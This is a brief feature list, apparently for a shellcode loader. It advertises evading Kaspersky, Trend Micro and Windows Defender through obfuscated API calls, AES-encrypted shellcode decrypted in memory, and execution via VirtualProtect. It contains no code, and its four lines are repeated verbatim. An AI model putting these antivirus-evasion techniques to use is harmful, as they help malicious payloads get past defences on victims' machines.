๐ฆ Evade Kaspersky Total Security and Trend Micro Maximum Security and Windows Defender, tested on Windows 10 & 11. Using the following techniques.
๐กLoad custom DLL (API.dll) to obfuscate API calls.
๐กAES encryption to obfuscate shellcode
๐กDecrypt shellcode in memory to prevent static detection
๐กAllocate & execute shellcode with VirtualProtect to bypass memory protection
๐กLoad custom DLL (API.dll) to obfuscate API calls.
๐กAES encryption to obfuscate shellcode
๐กDecrypt shellcode in memory to prevent static detection
๐กAllocate & execute shellcode with VirtualProtect to bypass memory protection